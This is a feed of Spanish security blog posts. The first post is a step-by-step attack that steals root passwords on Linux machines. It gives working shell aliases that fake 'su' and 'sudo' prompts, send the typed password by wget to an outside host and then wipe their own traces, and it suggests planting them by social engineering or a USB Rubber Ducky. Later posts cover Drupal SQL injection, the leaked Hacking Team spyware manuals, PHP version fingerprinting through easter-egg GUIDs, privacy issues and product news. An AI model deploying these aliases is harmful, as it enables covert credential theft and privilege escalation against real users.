A principios de este año nos enteramos de que en mi centro de estudios iban a poner Linux en los laboratorios de electrónica. En concreto estaban metiendo GNU/Linux Manjaro, una derivada de Arch Linux en la que por seguridad, los usuarios utilizarían cuentas no privilegiadas para trabajar y cuando fuera necesario pasarían a modo super usuario con un comando "su", para gestionar software o hacer configuraciones.

Figura 1: Cómo hacer ataques a sistemas GNU/Linux con alias maliciosos

El reto que se nos planteó era ver si sería complejo o no robar las cuentas de los super usuarios en los sistemas de este entorno, para ver si esto podía generar muchos problemas de soporte o no. Con esto en mente, se me ocurrió que una forma de robar las contraseñas sería usar un comando alias de los sistemas *NIX* para crear un falso "su" que me permitiera acceder a las contraseñas cuando se teclearan en una sesión de usuario no privilegiado para pasar a super usuario. Os cuento el ataque paso a paso.

Paso 1: Control de la sesión no privilegiada

El primer objetivo es conseguir el acceso a una sesión no privilegiada del sistema. Esto puede hacerse de muchas formas que van desde aprovechar un descuido de la sesión hasta "te paso este ejercicio en este pendrive, ejecuta este programa que te copia todos los ficheros de esta práctica" - para lo que yo me creé un pequeño script bash que descarga de Internet todo - , o cualquier forma de conseguir una ejecución de un script en el sistema. Un buen truco podría ser utilizar un USB Rubber Ducky para ejecutarlo en un descuido de la víctima.

Figura 2: USB Rubber Ducky simula ser un pendrive pero es un teclado programado

No olvidéis que esto está pensado para ataques que se realizan en entornos conocidos y la ingeniería social es importante, como en el ejemplo de ataque que se publicó ayer, donde se robaba la base de datos por medio de la apertura de un fichero Excel creado a medida.

Paso 2: Ejecución del script que crea el falso alias de su

El script inicial, al que llamé "aliasliado" crea un falso alias malicioso para su que simula un fallo en la autenticación cuando se introduce la contraseña que se requiere al ejecutar el autentico comando "su". La idea es que cuando se ejecute el comando "su", realmente se ejecutará el alias malicioso de "su". Éste pedirá la contraseña de super usuario, la robaría, me la enviaría, mostraría un error de autenticación y borraría todo. El script que crea este falso alias es el siguiente:

alias su=' echo -n "Contraseña: " ; read -s PASS1 ; wget --background --quiet --output-document=$HOME/.local/.wine32 "blogx86.net/aliasliado.php?victima=HackConcept&clave=$PASS1" > /dev/null ; echo "" ; sleep 3 ; echo "su: Fallo de autenticación" ; unalias su >> /dev/null 2>&1 ; unset PASS1 ; rm -f $HOME/.local/.wine32 > /dev/null 2>&1 ; sed -e "/^alias su/d" ~/.bashrc > .temporal ; mv .temporal ~/.bashrc '

Como se puede ver, una vez que se ejecuta el comando "su" vía el alias malicioso, la contraseña que se haya introducido ha volado a manos del atacante y se ha eliminado cualquier rastro de infección dejando que el equipo funcione como estaba funcionando antes.

Paso 3: Una evolución del ataque gracias a "melasudo"

Hablando ayer con Chema Alonso sobre la publicación de este artículo, descubrí que el equipo de auditoría web de Informática 64 - ahora en Eleven Paths - hace un par de años había hecho lo mismo, pero con el comando sudo, mucho más efectivo para algunas distribuciones de GNU/Linux como Ubuntu. En esos casos es script lo aprovechaban para ownear servidores web en los que habían conseguido acceso no privilegiado con la cuenta del servidor web y querían hacer una elevación de privilegios.

Figura 3: Script de melasudo que crea un alias malicioso para sudo

El paso a paso está explicado en el artículo: "Melasudo: robar la password a un sudoer con ingenio" En este alias malicioso, utilizan una llamada a un script oculto en el directorio $HOME de la víctima que me ha gustado, así que he mezclado ambas ideas en el siguiente alias malicioso para que sea mi "Chevrolet Camaro" en este tipo de ataques.

alias sudo=' echo -n "[sudo] password for $(whoami): " ; read -s PASS1 ; wget --background --quiet --output-document=$HOME/.local/.wine32 "blogx86.net/aliasliado.php?victima=HackConcept&clave=$PASS1" > /dev/null ; echo "" ; sleep 3 ; echo "Lo sentimos, vuelva a intentarlo." ; unalias sudo >> /dev/null 2>&1 ; unset PASS1 ; rm -f $HOME/.local/.wine32 > /dev/null 2>&1 ; sed -e "/^alias su/d" ~/.bashrc > .temporal ; mv .temporal ~/.bashrc ; sudo $1 $2 $3 $4 $5 $6 $7'

El siguiente vídeo muestra este script funcionando en un ataque. En él se puede ver cómo se crea el alias malicioso, se roba la contraseña y luego todo queda igual que antes.

Figura 4: Vídeo demostración de ataque con alias malicioso
Conclusiones

Cualquier punto de entrada sigue siendo potencialmente peligroso, ya sea un fichero Excel, un USB Rubber Ducky que se conecta o un programa camuflado de cualquier forma. Conseguir la ejecución en un entorno no privilegiado sería el primer paso para conseguir luego la elevación de privilegios, aun con ayuda de un usuario.

Figura 5: Como conseguir una elevación en Windows con infección de enlaces a aplicaciones no privilegidas

Hace tiempo, cuando Windows Vista implantó UAC por defecto con el máximo nivel de seguridad, ya se publicó en el año 2007 una forma similar para lograr la elevación de privilegios infectando los enlaces a aplicaciones que el usuario no privilegiado tenía, así que como veis, el ataque se puede hacer igualmente en sistemas Windows.

Autor: Christian Prieto
Escritor del blog X86.net

Ya que estamos en la noche de Halloween, donde los seres del utlramundo asolarán la noche para ponerse hasta arriba de licores espirituales que los convierta aún más en lo que representan, donde a altas horas de la noche los zombies de incógnito se mezclarán con los de que van disfrazados de tal ente, para compartir con vosotros un macabra reflexión sobre la muerte de todos y cada uno de nosotros. La pregunta que os hago es... ¿a quién le vas a decir la fecha de tu muerte?

Figura 1: ¿A quién le vas a decir la fecha de tu muerte?

Decía el mítico Clint Eastwood en una de sus películas de mi niñez en las que actuaba al margen de la ley que se había retirado por las matemáticas. "¿Las matemáticas?", le pregunta inocente el actor que le da soporte en esa escena. "Sí, los números dicen que en esta profesión a mi edad se suele estar muerto". La estadística que tanto nos hace sufrir en la universidad resulta ciencia clave para el análisis de los datos y la predicción del futuro. Sumado a ella, las técnicas de machine learning basadas en datos y datos de entrenamiento, al final consigue que esa matemática acabe convirtiéndose en resultados más o menos certeros de lo que va a pasar en el futuro, y dad por cierto que vuestra muerte esté en el futuro - os deseo que tan lejos como se sea posible -.

Lo cierto es que si nos hiciéramos un chequeo médico con asiduidad y nos midieran los valores de nuestro sistema cada cierto los doctores, aplicando su estadística y los sistemas de machine learning podrían saber más o menos cuándo va a suceder eso. Cuando alguien con tus síntomas, valores y hábitos va a vivir. Si esto lo hacemos regularme con sensores que reportan constantemente tus datos a la consulta del doctor éste podrá tener más información y pronosticar de forma más atinada cuando vas a comenzar a dormir el último sueño, el más largo y profundo que tendrás.

Figura 2: Datos de actividad física en Endomondo

Eso ya está aquí, y los datos médicos corren a servidores en la cloud bajo las famosas aplicaciones de e-health o los portales para deportistas como Endomondo - ¿La comprará Facebook y acabarán tus datos junto a tus likes y a tus fotos de fiesta? - que recoge tu actividad física. Qué mejor información que una información en tiempo real de todo lo que haces, de cómo reacciona tu cuerpo de cómo te sientan tus propios hábitos para saber cuándo cruzarás con el barquero a la otra orilla.

Ahora Microsoft se ha metido en este mercado con una nueva pulsera y el Apple Watch también tiene sensores para monitorizar tu salud e incluso el nuevo iOS 8 de Apple, sin decirme nada ha comenzado a contar los pasos que doy, los pisos que subo, por dónde me muevo, etc. Todo ello, supuestamente, para que yo me controle. Pero, evidentemente, al final los números los tiene alguien, estarán en algún sitio para que formen parte de ese big data mágico que le permitirá saber a la compañía que elija el momento en el que creen que moriré, y hasta detectar que acabo de hacerlo para comprobar su predicción.

Figura 3: Monitorización de pasos en iOS 8 automática

Este control de salud podrá llegar a convertirse en algo preventivo que te permita mejorar tu salud o en algo completamente pernicioso que se convierta en un asedio de ofertas con planes de pensiones, ataúdes baratos, denegación de créditos, inhabilitación para avalar operaciones o incremento de costes en seguros sanitarios, de vida o de conducir.

"Lo siento señor Martínez, no podemos darle ese crédito a 5 años porque nuestros sistemas dicen que tiene una probabilidad de morir dentro de 2 años superior al 82 % y por política de compañía nos está prohibido aprobarle su operación crediticia"

El negocio de la muerte siempre ha dado mucho dinero, desde asesinos a sueldos, mercenarios, enterradores, casas fúnebres, agoreros, salvadores de almas y hasta maquilladores para el momento del adiós. Ahora hay otro negocio en ciernes, los predictores que podrán vender a buen precio la fecha de tu muerte. ¿Quién será el tuyo? ¿Has hecho testamento ya? ¿Has elegido ya a quién le vas a decir cuándo te vas a morir? ¡Qué tengas un terrorífico Halloween!

Saludos Malignos!

Los titulares en los medidos de comunicación hablan de Apocalipse en Drupal 7 debido al bug de SQL Injection que se publicó el 15 de Octubre y que está siendo explotado de manera masiva y automatizada. El bug fue descubierto por Stefan Horst de Sektioneins y ha recibido el CVE-2014-3704. Dicho exploit a día de hoy ya es público y permite a cualquier atacante hacer un ataque de SQL Injection en el servidor sin necesidad de estar autenticado en la plataforma a través de unas funciones que en teoría son de seguridad para evitar ataques de SQL Injection.

Figura 1: Si no tienes la versión 7.32 probablemente estés hackeado

Desde ese momento, se habla de que probablemente, si tienes un Drupal 7 y no lo has actualizado a la versión 7.32 existe un alto grado de certeza de que esté comprometido. Lo que le hayan podido hacer a tu sitio depende. Pueden haberlo utilizado para distribuir malware, para meter paneles de control en ataques de phishing o simplemente para hacer BlackSEO, que siguen creciendo día a día el número de sitios infectados. Revisa en detalle tu sitio, y si no ves nada busca bien otra vez si no tienes el Drupal 7 actualizado.

Figura 2: El bug de SQL Injection está en el prepare stament que usa Drupal 7 para evitar SQL Injection

El equipo de Drupal publicó el Security Advisory donde además deja recomendaciones de qué debes hacer si el sitio ha sido comprometido por un ataque. En él se dejan algunas reflexiones prácticas que debes tener en cuenta sobre cómo proceder para hacer un análisis forense del sitio, decisiones que debes tomar y medidas legales a ejecutar en cada caso.

Figura 3: Security Advisory de Drupal alertando de que es Highly Critical

Yo te recomiendo que actualices todo el software y reinstales una copia de seguridad anterior al 15 de Octubre, para evitar cualquier problema. Si el sitio ha sido comprometido pueden haber dejado backdoors a nivel de sistema operativo, a nivel de base de datos, a nivel de servidor web o a nivel de aplicación web. Por supuesto, si se han llevado los usuarios y las contraseñas debes cambiarlas todas sin excepción.

Figura 4: Guía de instalación de Latch en Drupal 7

Mi recomendación es que fortifiques el sistema pensando ya en el futuro y que establezcas una política de copia de seguridad que evite que pierdas muchos datos en un caso similar a posteriori. Recuerda que si quieres también puedes poner Latch en Drupal 7 para evitar que cualquier password sea utiliza sin consentimiento del usuario en un ataque futuro.

Saludos Malignos!

El periodista Gleen Greenwall ha publicado en The Intercept una serie de manuales pertenecientes a la empresa italiana Hacking Team. Esta compañía se dedica a comercializar, al igual que hace por ejemplo FinFisher, software para espionaje gubernamental. Según ellos, han vendido sus sistemas en 40 países en los 5 continentes de nuestro planeta.

Figura 1: Filtrados los manuales y guías de Hacking Tema RCS 9

Con estas guías que han sido filtradas - datadas en 2013 - puedes ver cómo funciona la herramienta para los técnicos de campo en la Guía para Técnicos, donde se explica cómo montar las operaciones, la Guía del Administrador del Sistema donde se cuenta cómo funciona el sistema completo, la Guía del Administrador de las operaciones y la Guía del Analista de la información. Además de algunos docs extra como un par de changelogs y un Informe de Invisibilidad. Material digno de analizar. Éste es un pequeño resumen de todo lo que puedes leer allí.

RCS (Remote Control System) 9

Las guías que se han filtrado hacen referencia a Remote Control System, la versión R.A.T. (Remote Administrator Tool) que comercializan como software de espionaje de objetivos para cuerpos y fuerzas de seguridad. Este sistema se bas en infectar equipos por medio de lo que llaman Network Injectors, que sirven exploits y agentes de infección a los equipos objetivos, ya sean terminales móviles o sistemas operativos. En la guía para los técnicos se puede ver cómo funciona este software.

Figura 2: El Tactical Control Center y los Network Injectors para meter el agente

El sistema RCS 9 de Hacking Team inyecta el software malicioso vía ataques de red usando puntos de acceso Rogue WiFi clonados para lanzar falsas actualizaciones en entornos de Evil Grade como hace FinFisher, ataques man in the middle comunes para inyectar descargas en navegación web, etcétera. Lo que van a enviar puede ser distinto en cada caso, desde una falsa actualización, una descarga forzada vía técnicas de phishing o un exploit que comprometa la seguridad del cliente para inyectar el agente de monitorización.

Figura 3: Configuración del agente a través de la consola de RCS

Estos agentes salieron a la palestra no hace mucho tiempo porque habían creado un mecanismo para infectar terminales iPhone a través del sistema operativo pareado. Estos agentes, cuando se conecta el terminal iOS al equipo realizan directamente el jailbreak para conseguir meter un troyano de espionaje en iOS sin la protección de codesigning de Apple.

Figura 4: Infección de iPhone haciendo jailbreak al dispositivo desde el equipo pareado

Para eludir mejor las protecciones que pudieran suponer los antivirus, el manual recomienda comprar software de firmado de código de Verisign (Symantec), Thawte o GoDaddy, lo que hace que el software de protección sea menos proclive a eliminarlos del sistema al venir firmados. Este es el truco que usó tiempo atrás Flame, que al venir firmado por Microsoft ningún antimalware se atrevía a bloquearlo.

Figura 5: Evidencias capturadas de un equipo controlado

Una vez que los objetivos están infectados, el sistema RCS funciona en primer lugar como una herramienta de recolección de evidencias con técnicas de análisis forense - al estilo de por ejemplo Oxygen Forensics -, es decir, trayéndose del dispositivo a decisión del administrador todo el contenido, o haciendo una captura selectiva por medio de elementos seleccionados o por medio de alertas.

Figura 6: Evidencias de audio en RCS

Al igual que los R.A.T. para terminales móviles, permite capturar evidencias de todo tipo, como llamadas de teléfono en los dispositivos, sonido ambiente a través del micrófono, o realizar grabaciones con la cámara. Por supuesto, el agente reporta en todo momento lo que está pasado y funciona como una herramienta de monitorización en tiempo real que indica la ubicación exacta y los programas en ejecución en cada caso.

Figura 7: Análisis de ubicaciones de un objetivo infectado

Para los analistas del sistema, la consola es una herramienta de inteligencia en donde van a poder realizar búsquedas, establecer relaciones entre evidencias, hacer búsquedas de patrones, etcétera, como cualquier consola de búsqueda de conocimiento en datos desestructurados.

Figura 8: Análisis de relaciones con RCS de Hacking Team

Si te interesa conocer en detalle lo que se puede hacer con esta herramienta, para que sepas lo que pueden hacer esas 40 organizaciones en esos 5 continentes que lo habían comprado ya en el año 2011, puedes leerte en detalle las guías. Los documentos están disponibles para descarga en formato PDF, aunque las imágenes no se ven con muy buena calidad, en las siguientes URLs:

- Hacking Team RCS 9 Analyst’s Guide
- Hacking Team RCS 9 Administrator’s Guide
- Hacking Team RCS 9 Technician’s Guide
- Hacking Team RCS 9 System Administrator’s Guide
- Hacking Team RCS Invisibility Report
- Hacking Team RCS 9.0 Changelog
- Hacking Team RCS 9.1 Changelog

Recordad que este software ha tenido presencia en muchos de los incidentes que se cuentan en el informe sobre el espionaje gubernamental a disidentes y en algunos ejemplos de los incidentes de ciberespionaje entre países.

Saludos Malignos!

Hace poco hablaba de las posibles consecuencias de la entrega de datos de salud a cualquier empresa con la excusa del e-health, que podría llegar a conocer la fecha aproximada de tu muerte. Pero en mi opinión aún es peor cuando estos datos no se los das a cualquiera sino a todo el mundo, que fácilmente podrá saber cuál es tu estado de salud.

Figura 1: Runtastic, otra red social de deportistas que publica su ubicación y salud

Hace unos meses hablé de las opciones de privacidad por defecto en la red social para deportistas Endomondo que permitían saber tus hábitos de deporte, tus horarios y hasta cuál es tu estado de salud. Toda esa información publicada para todo Internet me parece una idea descabellada, y por eso os animaba a proteger la privacidad de dicha información. Pues bien, como me ha apuntado un amigo, Runtastic también hace algo similar con tus rutas, de las que hay indexadas miles de ellas solo de usuarios en España.

Figura 2: Rutas de Rustastic de usuarios españoles indexadas en Google

Como se puede ver, guarda información sobre las rutas, por defecto públicas, en las que se puede ver también horarios y ubicaciones que pueden servir para que alguien sepa exactamente dónde y cuándo vas a estar, lo que no es recomendable si se hace con hábitos rutinarios.

Figura 3: Una ruta en bici por el monte

Pero lo mejor es que publica todos tus datos de la ruta, y entre otro quedan los datos de la frecuencia cardiaca, lo que es similar a hacer un test de estrés médico para que un especialista sepa cuál es tu estado de salud. Por supuesto, si estás hecho un roble tal vez no tengas ningún problema, pero si no es así, a lo mejor empiezas a tener problemas en tu vida para conseguir un trabajo, un crédito o vaya usted a saber qué más. Por supuesto, si estás de baja laboral por alguna dolencia... ten cuidado a ver qué ruta publicas.

Figura 4: Una ruta corriendo con los datos del latido del corazón

Además, por si la prueba de estrés de una ruta no fuera suficiente, de cada miembro de la red también se puede ver un agregado por semanas, mes, año y en general, con lo que se puede ver cómo es la evolución médica o de salud de cada uno de ellos.

Figura 5: Un resumen de las estadísticas de cada usuario

Yo entiendo que hay una parte social y divertida en compartir esta información con amigos - o con ligues a los que quieres impresionar con el bombeo de tu corazón, la potencia de tus piernas o la fuerza de tus glúteos - pero a lo mejor no es buena idea que esté al alcance de cualquiera. Además, recuerda que poner información pública en Internet es bastante sencillo, pero conseguir que desaparezca para siempre es casi imposible.

Saludos Malignos!

El pasado 16 de Octubre tuvo lugar en el Auditorio Principal de Telefónica nuestro evento Security Innovation Day 2014, donde presentamos las novedades respecto las tecnologías que creamos en Eleven Paths y comercializamos a través de Telefónica. La primera de las sesiones, la Keynote, estaba orientada a contar a los clientes los avances en algunas tecnologías que ya habíamos presentado, junto con los testimonios de algunos clientes, y ahora la puedes ver en el siguiente vídeo que ha sido subido al Canal Youtube de Eleven Paths:

Figura 1: Security Innovation Day 2014: Keynote
La Keynote cuenta entre otras cosas los avances en materia de Vigilancia Digital, donde además de la incorporación de módulos de nuestro sistema de Pentesting Persistente este año, se han incluido los acuerdos con Kaspersky y la Digital Crime Unit de Microsoft, además de los productos Sinfonier y Path 5 para conseguir tener un mejor vigilante en la red.

Figura 2: Acuerdo entre Microsoft Digital Crime Unit & Eleven Paths
En el caso de MetaShield, además de contar con una nueva versión online para que todo el mundo pruebe si un documento tienen o no metadatos, fugas de información y/o datos perdidos, llamada MetaShield Analyzer, presentamos las nuevas evoluciones de los productos con una integración de MetaShield Client dentro de Microsoft Outlook, tal y como se puede ver en el siguiente vídeo.

Figura 3: MetaShield Protector for Clients con Microsoft Outlook
También destacamos el nuevo producto integrado en el que estamos trabajando, tanto RadWare como nosotros, para integrar las soluciones MetaShield Protector dentro de un WAF (Web Application Firewall) que evite las fugas de metadatos de cualquier servicio HTTP/FTP que esté protegido por él.

Figura 4: Participa en el concurso de Latch y gana unos BitCoins
En la parte de Latch, además de traeros el testimonio de alguno de nuestros clientes, anunciamos el acuerdo con Incibe para llevar Latch Silver a las PYMES españolas y el concurso de desarrollo de soluciones Latch Plugin Contest por el que vamos a regalar 10.000 USD, 5.000 USD y 1.000 USD a las mejores ideas, además de la posibilidad de obtener una beca laboral con nosotros.

Figura 5: Funcionamiento normal de una petición Latch

Por último contamos la aparición de un nuevo producto, llamado Latch Satellite, que permite poner un virtual appliance en la empresa para tener un copia-caché en cada instante de los status de las cuentas pareadas.

Figura 6: Funcionamiento de Latch Satellite

Por último, en la parte de Gestión de Vulnerabilidades contamos nuestra visión de una evolución a Gestión de Vulnerabilidades Persistente utilizando nuestro sistema en cloud Faast para detectar en el menor tiempo posible los nuevos bugs de seguridad. A este producto le dedicaríamos una sesión aparte que os pondré más adelante.

Además de estas cosas, en el evento anunciamos muchas más, pero fueron en otras sesiones que os iremos publicando poco a poco, como la incorporación de las tecnologías y personas de SmartAccess en Eleven Paths, las tecnologías de Alise Devices que vienen desde una start-up de Wayra, las novedades técnicas de Faast o el nuevo producto Path 5, pero os lo contaré en otro artículo.

Saludos Malignos!

Para comenzar este artículo sobre como proteger un dispositivo de Internet con Latch, donde he disfrutado pegándome con la tecnologías, he decir que OpenWRT, además de ser un sistema operativo basado en Linux y contar con una buena comunidad detrás con constante soporte, ha acabado aplicado y siendo instalado en muchos dispositivos de los que se usan hoy en Internet, como en los routers de algunas marcas tales como TP-LINK, ASUS o Mikrotik, por nombrar solo algunas.

Figura 1: Integración de Latch con OpenWRT

Tras varias revisiones iniciales buscando la mejor estrategia para poner Latch en mi OpenWRT, despejé algunas ideas por no ser demasiado prácticas, como por ejemplo aplicar a capón el plugin Latch para SSH, ya que requeriría de un espacio del que no disponemos en las imágenes que podemos encontrar en el repositorio de OpenWRT. Esta falta de espacio es lógica, ya que estas versiones de OpenWRT no fueron elaboradas pensado en que pudieras compilar programas en los dispositivos de red.

Preparando el dispositivo con OpenWRT

Inicialmente decidí pegarme para conseguir más espacio en el disco ya que la con OpenWRT te facilitan las ToolChain para hacer compilación cruzada e incluso para realizar tu propia imagen de OpenWRT. Sin embargo, hacer esto exigía hacer algún hack con una tarjeta MicroSD que poner en el dispositivo. Así que decidí, que en lugar de realizar cross-compiling era mucho más sencillo y realista añadir unas líneas al script que hizo Alejandro Ramos (@aramosf) para poner Latch en un servidor FTP, como bien me sugirió Sergio de los Santos (@ssantosv). Es más práctico ir a lo sencillo :)

Figura 2: Configuración de OpenWRT en la Raspberry Pi con acceso web vía LUCi

Las pruebas que he realizado con este script fueron sobre una de las últimas imágenes de Barrier Breaker que podéis encontrar en la sección de Descargas de OpenWRT para lo que primeramente, se requiere de un dispositivo, router o AP o un equipo al que le queramos dar funcionalidad una funcionalidad de red como firewall, router, punto de acceso WiFi o sniffer y en el que podamos instalar OpenWRT para terminar de securizarlo después con Latch. Por supuesto, hasta una Raspberry Pi como es en mi caso puede valer para hacer esto. En mi caso, me bajé la versión en .img y mediante un lector de tarjetas, instalé el SO en la MicroSD de la Raspberry Pi.

Configuración de paquetes en OpenWRT

Para conseguir correr el script que nos proteja con Latch el dispositivo necesitamos ciertas utilidades en el sistema. En OpenWRT podemos encontrar el programa BusyBox, con ciertas utilidades básicas de Unix, pero no nos bastan si queremos ejecutar el script que hizo Alejandro Ramos, por lo que tendremos que instalar algunos packages del repositorio para la arquitectura de la imagen que hayamos seleccionado. Esto lo he implementado en el script “reg.sh” para que lo haga automaticamente.

Figura 3: Configuración de paquetes en OpenWRT con el script reg.sh (1)

Si dispones de una imagen con el fichero opkg.conf con las fuentes de repositorio actualizadas debería de funcionar correctamente cuando haga un check de tu opkg list. Para que funcione correctamente es necesario instalar "coreutils-base64” para poder codificar en base64.

Figura 4: Configuración de paquetes en OpenWRT con el script reg.sh (2)

Como se puede ver, también es recomendable actualizar “wget" por si la versión que probáis no está demasiado actualizada que últimamente ha habido fiesta con él, "openssl-util” para habilitar el acceso web por https vía LUCi, pero sobretodo es necesario instalar o actualizar "bash".

Figura 5: Configuración de paquetes en OpenWRT con el script reg.sh (3)

Esto es porque pude apreciar, que en algunos repositorios no están presentes todas las versiones del shell bash parcheado contra Shellshock, aunque ya había tickets para su actualización, así que como consejo, buscad una versión actualizada de bash. Si no la vierais en el repositorio, yo encontré alguna en github.

Una vez tengamos todo esto, si tenéis la app de Latch en el smarthphone, ya podremos generar el código temporal de pareado y proceder a poner un Latch tal y como se hace con todos los servicios protegidos con esta tecnología usando el comando ./reg.sh.

Configurando la Integración con Latch: Pareado

Para comenzar a configurar el script de Latch primero debes ir con tu cuenta de desarrollador a la web de Latch y crear una aplicación que nos servirá para este caso práctico. Una vez tengamos la aplicación creada en la cuenta de desarrollador de Latch, hay que rellenar los campos de “applicationId” y “secretkey” en cada uno de los scripts necesarios. Aparte, puedes modificar el directorio donde quieras ejecutar los scripts de Latch cómodamente.

Figura 6: Configuración de Latch en reg.sh

Configurando la Integración con Latch: Comprobación de estado

El siguiente paso, es rellenar igualmente “applicationId” y “secretkey” en el script de estado status.sh, que será el que utilizaremos para bloquear/desbloquear OpenWRT de accesos Telnet/SSH o HTTP/HTTPS. Para ello seguí las recomendaciones de seguridad de la documentación de la web de OpenWRT, dejando acceso exclusivamente por SSH y deshabitando el acceso web HTTP y habilitando conexión por SSL. Así que las líneas que añadí al script “status.sh” original cuentan con este caso, es decir, en caso de Latch activado, debe expulsar al usuario del router al tratar de acceder y tirar las conexiones https vía reglas iptables.

Figura 7: Script status.sh para comprobar el estado del Latch

Desde mis conocimientos, la mejor manera que encontré de aplicar estas funcionalidad fue con la captura del proceso del usuario que trata de acceder por SSH y guardarlo en una variable, para poder expulsarlo y en por otro lado como antes comentaba, usar reglas del firewall iptables para bloquear el tráfico para la conexión por SSL al recurso web. He tratado de contar con todos los estados posibles con este script:

Figura 8: Configuración de posibilidades en status.sh (2)

- Con acceso a Internet y estado bloqueado
- Con acceso a Internet y estado desbloqueado
- Sin acceso a Internet y estado desbloqueado
- Sin acceso a Internet y estado bloqueado: Éste estado es imprescindible ya que de otra manera, dejaría el router inaccesible para quien use el script.

Importante, para que el script de estado se ejecute cada vez que accedáis al router, bien se añade como primera línea el directorio desde el que se ejecutar el script “status.sh” en el fichero .profile, este fichero debería de encontrarse en la carpeta raíz de tu usuario y si no lo puedes crear pero si alguien prefiere que se ejecute cada vez que lance bash, igualmente se añade la línea en el fichero .bashrc en la misma ubicación.

Figura 9: Prueba de ejecución manual de status.sh

Configurando la Integración con Latch: Despareado

Por la parte del fichero de despareo de la aplicación, no tuve más que modificar el directorio desde el que ejecuto el script unreg.sh, así que no tiene mucha complicación. El código fuente de este script lo puedes ver en la siguiente imagen:

Figura 10: El script de unreg.sh para desparear la cuenta de Latch

Conclusiones

Al final el sistema funciona, así que la aproximación parece que fue la más apropiada. No obstante, si observáis cualquier error o sugerencia, por favor comentadlas en este artículo, que intentaré subsanarlas. Cualquier idea de mejora será bienvenida. Gracias. Si tienes una idea para hacer algo cosa chula con Latch, acuérdate de que hay un concurso de plugins de Latch con el que puedes ganar hasta 10.000 USD.

Autor: Guillermo R. Miralles

Los Huevos de Pascua son comunes entre los ingenieros tecnológicos. Famosos son los que los equipos de Apple han puesto a lo largo de la historia, que van desde mostrar fotos - que a veces se encuentran de la forma más inesperada - hasta vídeos, el discurso de Stanford de Steve Jobs o grabaciones de audio. En el caso de Microsoft, en sus productos han llegado hasta a meter juegos que puedes disfrutar desde el propio Excel 2010, donde está incluido el Missile Command y el Tower Defense. Los ingenieros de Google también son proclives, son famosos los Huevos de Pascua en Youtube donde se puede jugar también a juegos como Missile Command. En el nuevo Google Chrome Canary se ha metido en la página de error que muestra problemas de conexión de red el juego del T-Rex Runner, así que en lugar de tener una aburrida página que te frustra, podrás jugar con el dinosaurio.

Figura 1: Cómo saber la versión de PHP de un servidor web por los huevos de pascua

Los Huevos de Pascua molan, pero a veces pueden ser peligrosos, especialmente si se pueden convertir en algún problema de seguridad. Lo cierto es que, debido a que los ingenieros ponen los Huevos de Pascua en versiones concretas de software, el descubrimiento de ellos deja claro cuál es la versión que está instalada, y éste es el caso que puede utilizarse en PHP para hacer fingerprinting y conocer si un servidor web tiene desactualizado el framework.

Las imágenes del framework PHP cargadas vía parámetros

Si alguna vez has visto un fichero PHP Info, sabrás que salen unas imágenes en el mismo. Estas imágenes son de PHP y el de Zend Engine. Si miras el código fuente podrás ver que se pintan llamando a los parámetros siguientes:

Figura 2: Logo de PHP que sale en info.php

- Logo de PHP: ?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
- Logo de Zend Engine: ?=PHPE9568F35-D428-11d2-A769-00AA001ACF42

Figura 3: Logo de Zend Engine

Para sacar estas imágenes se puede utilizar ese parámetro en cualquier fichero PHP de cualquier sitio web que no los haya capado,

El fichero de créditos del framework PHP

Al igual que se obtiene un fichero PHP Info, y las imágenes de los logos, se puede obtener un fichero de respuesta con la lista de los autores de todas las versiones de ese software que vienen con ese framework.

Figura 4: Fichero de créditos en una versión de PHP 5.1.3 a 5.2.13

Para ello hay que cambiar el parámetro que hay que enviar al fichero PHP.

- ?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000

Figura 5: Fichero PHP Credits de una versión actualizada

Por supuesto, los créditos de PHP cambian dependiendo de la versión, así que es un buen elemento para poder hacer un fingerprinting a la versión exacta del framework que está corriendo en un determinado sitio web.

El Huevo de Pascua del framework PHP

La última de las características es la más peligrosa desde el punto de vista de seguridad, ya que dependiendo de la versión exacta se puede obtener un logo que cambia y afina bastante.

Figura 6: Logo de Elefante en un framework PHP en la web

Para ello se debe utilizar el parámetro siguiente:

- ?=PHPE9568F36-D428-11d2-A769-00AA001ACF42

Figura 7: Diferentes imágenes que se obtienen en los huevos de pascua de PHP

Y se obtendrán las siguientes imágenes dependiendo de la versión:

- PHP Versión 5.3 a actual: Logo de PHP con un elefante
- PHP Versión 5.1.3 a 5.2.13: Logo de PHP movido
- PHP Versión 5.0.4 a 5.1.2: Foto de Perro Terrier Escocés Negro.
- PHP Versión 5.0.0. a 5.0.3: Foto de un conejo.
- PHP Versión 4.3.11 a 4.4.6: Foto de Perro Terrier Escocés Negro.
- PHP Versión 4.3.0 a 4.3.10: Foto de Perro color canela sobre césped.
- PHP Versión 4.0.0 a 4.2.3: Foto de programador divertida.

Todas estas fotos son personales de los desarrolladores y el equipo que está detrás del proyecto, pero este Huevo de Pascua en concreto, que no está documentado, puede informar a un atacante - si no sale el logo del elefante, que tu sistema está sin actualizar con un buen número de bugs.

Figura 8: Sitio web con versión antigua de framework PHP

Cómo quitar estas macros

Estos parámetros funcionan porque en el fichero de cabecera "php-source/ext/standard/info.h", en las líneas 53 a 56 puede leerse la definición de estos códigos. Así que basta con que comentes estas líneas de tu instalación y desaparecerán:

#define PHP_LOGO_GUID "PHPE9568F34-D428-11d2-A769-00AA001ACF42"
#define PHP_EGG_LOGO_GUID "PHPE9568F36-D428-11d2-A769-00AA001ACF42"
#define ZEND_LOGO_GUID "PHPE9568F35-D428-11d2-A769-00AA001ACF42"
#define PHP_CREDITS_GUID "PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000"

Por supuesto, mi recomendación es que lo quites. Cuanta menos información des de tu infraestructura, mejor que mejor, así que en las recomendaciones de nuestro sistema de pentesting persistente Faast se avisa a los clientes de este hecho.

Saludos Malignos!

Hace un par de días me pasaron por correo electrónico un pequeño truco para localizar a personas en Facebook que hubieran cambiando su nombre o la dirección de la página, ya que esas dos características pueden ser modificadas. Facebook no permite que se cambien esos parámetros siempre que se quiera, pero sí se puede hacer al menos una vez. Localizar el nuevo nombre o la nueva dirección URL de una persona que se haya cambiado esos datos si tienes información del perfil antiguo.

Figura 1: ¿Cómo localizar la página o el perfil en Facebook de alguien que se ha cambiado el nombre o la URL?

La idea es bastante sencilla, y para explicárosla he utilizado mi página en Facebook. Como podéis ver, mi direción URL es Chema.Alonso.Maligno y mi nombre es Chema Alonso. Esos son los datos que Facebook me va a permitir cambiar.

Figura 2: Página web en Facebook de Chema Alonso

